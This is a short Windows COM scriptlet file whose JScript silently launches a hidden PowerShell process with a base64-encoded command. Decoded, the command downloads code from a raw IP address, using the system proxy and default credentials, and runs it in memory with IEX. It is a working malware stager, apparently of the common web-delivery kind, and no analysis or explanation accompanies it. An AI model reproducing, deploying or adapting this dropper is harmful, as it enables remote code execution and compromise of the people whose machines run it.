<?XML version="1.0"?><scriptlet><registration progid="W0CGumrM" classid="{dd988d8f-569e-2028-5c39-66d37bd9be2b}" remotable="true"></registration><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e W05ldC5TZXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VjdXJpdHlQcm90b2NvbD1bTmV0LlNlY3VyaXR5UHJvdG9jb2xUeXBlXTo6VGxzMTI7JG09bmV3LW9iamVjdCBuZXQud2ViY2xpZW50O2lmKFtTeXN0ZW0uTmV0LldlYlByb3h5XTo6R2V0RGVmYXVsdFByb3h5KCkuYWRkcmVzcyAtbmUgJG51bGwpeyRtLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JG0uUHJveHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7fTtJRVggKChuZXctb2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vOC4yMTAuMzcuMTkvSWI4VW00eGRLa2pObFYnKSk7",0);]]></script></scriptlet>
